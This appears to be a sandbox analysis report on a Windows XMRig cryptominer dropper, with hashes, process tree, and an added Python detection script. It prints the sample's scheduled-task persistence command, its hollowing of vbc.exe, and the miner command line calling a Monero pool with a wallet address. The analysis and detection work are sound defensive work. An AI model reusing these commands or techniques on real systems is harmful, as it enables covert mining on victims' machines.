Analysis
max time kernel: 93s
max time network: 137s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/11/2022, 22:48
Static task: static1
Behavioral task: behavioral1
Sample: b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe
Resource: win7-20220812-en
General
Target: b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe
Size: 1.7MB
MD5: 27b284fab61afb4e351edbcbd930aa3f
SHA1: 06d1988f308245688c337c1e4751cf3c262a02ba
SHA256: b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6
SHA512: 07f40ee220eaf4f27a58d6389496694de8aebbfe3f5b588988349a68b1192faca4cd7fd81eb9f17bf3836e786381f1865658b65bc06942dff495736d0b08f3b3
SSDEEP: 49152:PvKK9gn45q8P+D48aQ5QhRPjkNtJeLHkJkQ:PWoetJeDE
Malware Config
Signatures
XMRig Miner payload (6 IoCs)
resource / yara_rule:
behavioral2/memory/912-145-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
behavioral2/memory/912-146-0x0000000140343234-mapping.dmp  xmrig
behavioral2/memory/912-147-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
behavioral2/memory/912-148-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
behavioral2/memory/912-150-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
behavioral2/memory/912-152-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
Executes dropped EXE (1 IoC)
pid / Process: 2352  DBJYPFS.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description / ioc / Process: Key value queried  \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation  DBJYPFS.exe
Uses the VBS compiler for execution (1 TTP)
vbc.exe is the .NET Visual Basic compiler, a signed Microsoft binary with no legitimate reason to run here. DBJYPFS.exe starts it only as a host process: the SetThreadContext and WriteProcessMemory entries below, together with the xmrig YARA hits on PID 912's memory at 0x140000000, are consistent with process hollowing of vbc.exe.
Suspicious use of SetThreadContext (1 IoC)
description / pid / Process / procid_target: PID 2352 (DBJYPFS.exe) set thread context of PID 912 (vbc.exe), procid_target 93
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The signature's stock description reads "Likely ransomware behaviour"; in this run the payload is an XMRig miner (see the YARA hits and the vbc.exe command line), so treat this as plain drive enumeration rather than evidence of encryption.
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process: 1684  schtasks.exe

Delays execution with timeout.exe (1 IoC)
pid / Process: 4556  timeout.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid / Process: 2352  DBJYPFS.exe

Suspicious behavior: LoadsDriver (1 IoC)
pid / Process: 648  Process not Found

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description / pid / Process:
Token: SeDebugPrivilege  1064  b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe
Token: SeDebugPrivilege  2352  DBJYPFS.exe
Token: SeLockMemoryPrivilege  912  vbc.exe
Token: SeLockMemoryPrivilege  912  vbc.exe
SeLockMemoryPrivilege is the privilege XMRig enables to back its scratchpad with large pages; a compiler binary has no reason to request it, which corroborates that PID 912 is running miner code rather than vbc.exe's own.

Suspicious use of FindShellTrayWindow (1 IoC)
pid / Process: 912  vbc.exe

Suspicious use of WriteProcessMemory (24 IoCs)
description / pid / Process / procid_target (identical rows grouped, with counts):
PID 1064 wrote to memory of 2628  1064  b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe  79  (x2)
PID 2628 wrote to memory of 4556  2628  cmd.exe  81  (x2)
PID 2628 wrote to memory of 2352  2628  cmd.exe  86  (x2)
PID 2352 wrote to memory of 1748  2352  DBJYPFS.exe  88  (x2)
PID 1748 wrote to memory of 1684  1748  cmd.exe  90  (x2)
PID 2352 wrote to memory of 912  2352  DBJYPFS.exe  93  (x14)
Processes
Summary of the chain: the sample runs a batch file from %TEMP%, which sleeps 3 seconds (timeout 3) and then starts the dropped DBJYPFS.exe from C:\ProgramData\AppsWin. DBJYPFS.exe registers a scheduled task that re-launches it every 5 minutes at highest run level, then starts vbc.exe and injects into it; the command line handed to vbc.exe is an XMRig one (pool xmr-eu1.nanopool.org:14433 over TLS, coin monero).

C:\Users\Admin\AppData\Local\Temp\b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe"
  PID: 1064
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF409.tmp.bat""
    PID: 2628
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\timeout.exe
      command line: timeout 3
      PID: 4556
      - Delays execution with timeout.exe
    C:\ProgramData\AppsWin\DBJYPFS.exe
      command line: "C:\ProgramData\AppsWin\DBJYPFS.exe"
      PID: 2352
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DBJYPFS" /tr "C:\ProgramData\AppsWin\DBJYPFS.exe"
        PID: 1748
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\schtasks.exe
          command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DBJYPFS" /tr "C:\ProgramData\AppsWin\DBJYPFS.exe"
          PID: 1684
          - Creates scheduled task(s)
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4AAvbZFu6CJe2k13FgFmnDWHasLSbsKpXNumeQrWnZU8gpV9dURkEmJYtTYSohPLrCYA8bBN5PJRWbo1qgLuzpyNApcPYRh --tls --coin monero
        PID: 912
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
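The chain above is what a detection engineer would write rules against. The script below is an added example, not tria.ge's code and not anything from the sample: it replays the report's process tree and its SetThreadContext/WriteProcessMemory tables as constructed in-memory events and flags the three behaviours worth alerting on here (a highest-privilege schtasks persistence whose action lives in ProgramData, a non-OS parent writing 14 times into vbc.exe before setting its thread context, and an XMRig-style pool/wallet command line regardless of which binary hosts it). The write-count threshold and the rule "an image under C:\Windows is an OS-signed host" are assumptions made for the example, not values from the report.

```python
"""Detection pass over the process chain shown in this report.

Added example, not tria.ge's code. Events are constructed from the report's
process tree and its SetThreadContext / WriteProcessMemory tables so the
script runs offline; on a live host the same checks would consume Sysmon
event IDs 1 (process create) and 10 (process access) or EDR telemetry.
"""
import re
from collections import Counter, defaultdict

DROPPER = r"C:\Users\Admin\AppData\Local\Temp\b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe"
VBC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
WALLET = "4AAvbZFu6CJe2k13FgFmnDWHasLSbsKpXNumeQrWnZU8gpV9dURkEmJYtTYSohPLrCYA8bBN5PJRWbo1qgLuzpyNApcPYRh"

# (pid, parent pid, image, command line), constructed from the report's process tree.
PROCESSES = [
    (1064, 0, DROPPER, f'"{DROPPER}"'),
    (2628, 1064, r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF409.tmp.bat""'),
    (4556, 2628, r"C:\Windows\system32\timeout.exe", "timeout 3"),
    (2352, 2628, r"C:\ProgramData\AppsWin\DBJYPFS.exe", r'"C:\ProgramData\AppsWin\DBJYPFS.exe"'),
    (1748, 2352, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DBJYPFS" /tr "C:\ProgramData\AppsWin\DBJYPFS.exe"'),
    (1684, 1748, r"C:\Windows\system32\schtasks.exe",
     r'schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DBJYPFS" /tr "C:\ProgramData\AppsWin\DBJYPFS.exe"'),
    (912, 2352, VBC, f"{VBC} -o xmr-eu1.nanopool.org:14433 -u {WALLET} --tls --coin monero"),
]
# (source pid, target pid), constructed from the report's SetThreadContext and
# WriteProcessMemory tables; the 24 write rows collapse to these pairs and counts.
SET_THREAD_CONTEXT = [(2352, 912)]
WRITE_PROCESS_MEMORY = ([(1064, 2628)] * 2 + [(2628, 4556)] * 2 + [(2628, 2352)] * 2
                        + [(2352, 1748)] * 2 + [(1748, 1684)] * 2 + [(2352, 912)] * 14)

# Tuning values are assumptions for this example, not figures taken from the report.
HOLLOWING_WRITE_THRESHOLD = 3        # a normal parent touches a new child's memory once or twice
OS_BINARY_PREFIX = "c:\\windows\\"   # images under here are treated as Microsoft-signed hosts

POOL_RE = re.compile(r"(?:^|\s)-o\s+(?P<host>[\w.-]+):(?P<port>\d{2,5})\b")
WALLET_RE = re.compile(r"(?:^|\s)-u\s+(?P<wallet>4[1-9A-HJ-NP-Za-km-z]{94})\b")  # standard Monero address
TN_RE = re.compile(r'/tn\s+"?([^"\s]+)"?', re.I)
TR_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)


def images_by_pid(procs):
    return {pid: image for pid, _, image, _ in procs}


def find_miner_cmdlines(procs):
    """(pid, image, pool, wallet) for any command line carrying both a stratum pool
    and a Monero wallet; the hosting binary is deliberately ignored."""
    hits = []
    for pid, _, image, cmdline in procs:
        pool, wallet = POOL_RE.search(cmdline), WALLET_RE.search(cmdline)
        if pool and wallet:
            hits.append((pid, image, f"{pool['host']}:{pool['port']}", wallet["wallet"]))
    return hits


def find_task_persistence(procs):
    """(pid, task name, action) for schtasks.exe creating a highest-run-level task whose
    action lives under ProgramData or a user profile instead of Program Files/System32."""
    hits = []
    for pid, _, image, cmdline in procs:
        if not image.lower().endswith("\\schtasks.exe"):
            continue
        low = cmdline.lower()
        if "/create" not in low or "/rl highest" not in low:
            continue
        name, action = TN_RE.search(cmdline), TR_RE.search(cmdline)
        if name and action:
            target = action.group(1) or action.group(2)
            if re.search(r"\\(programdata|users)\\", target, re.I):
                hits.append((pid, name.group(1), target))
    return hits


def find_hollowing(procs, set_thread_context, writes):
    """(src pid, src image, dst pid, dst image, write count) where a non-OS parent wrote
    repeatedly into an OS-signed child and then set that child's thread context."""
    image, write_count, hits = images_by_pid(procs), Counter(writes), []
    for src, dst in set_thread_context:
        n = write_count[(src, dst)]
        if (n >= HOLLOWING_WRITE_THRESHOLD and image[dst].lower().startswith(OS_BINARY_PREFIX)
                and not image[src].lower().startswith(OS_BINARY_PREFIX)):
            hits.append((src, image[src], dst, image[dst], n))
    return hits


def render_tree(procs, root):
    """Indented process tree, one line per process, children in report order."""
    image, children, lines = images_by_pid(procs), defaultdict(list), []
    for pid, ppid, _, _ in procs:
        children[ppid].append(pid)

    def walk(pid, depth):
        basename = image[pid].rsplit("\\", 1)[-1]
        lines.append("  " * depth + f"{pid} {basename}")
        for child in children[pid]:
            walk(child, depth + 1)

    walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(PROCESSES, 1064)))
    print("persistence:", find_task_persistence(PROCESSES))
    print("hollowing:  ", find_hollowing(PROCESSES, SET_THREAD_CONTEXT, WRITE_PROCESS_MEMORY))
    print("miner:      ", find_miner_cmdlines(PROCESSES))
```

The three checks are deliberately independent so that each survives the others being evaded: renaming the task or moving it out of ProgramData does not hide the hollowing, and swapping vbc.exe for another LOLBin does not hide the pool/wallet pair on the command line.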
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 1.7MB
MD5: 27b284fab61afb4e351edbcbd930aa3f
SHA1: 06d1988f308245688c337c1e4751cf3c262a02ba
SHA256: b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6
SHA512: 07f40ee220eaf4f27a58d6389496694de8aebbfe3f5b588988349a68b1192faca4cd7fd81eb9f17bf3836e786381f1865658b65bc06942dff495736d0b08f3b3
Filesize: 143B
MD5: d530c0884f779a9145136f58007c06d7
SHA1: 9b7d9b7c193107aeb688fb60b6f30ee0501a618b
SHA256: a94e2825fda5aeee4c421ce5a0218ae038377050877d9766488aa1ebeca3d841
SHA512: 326dd947b24041b3aebc918926f4839de0cd30d01169a032c15ef826608bf9dfcfa7fd86f4f1e343c6f1ff29e735cb955701eae0efb32f18d37eeb6771c89eb4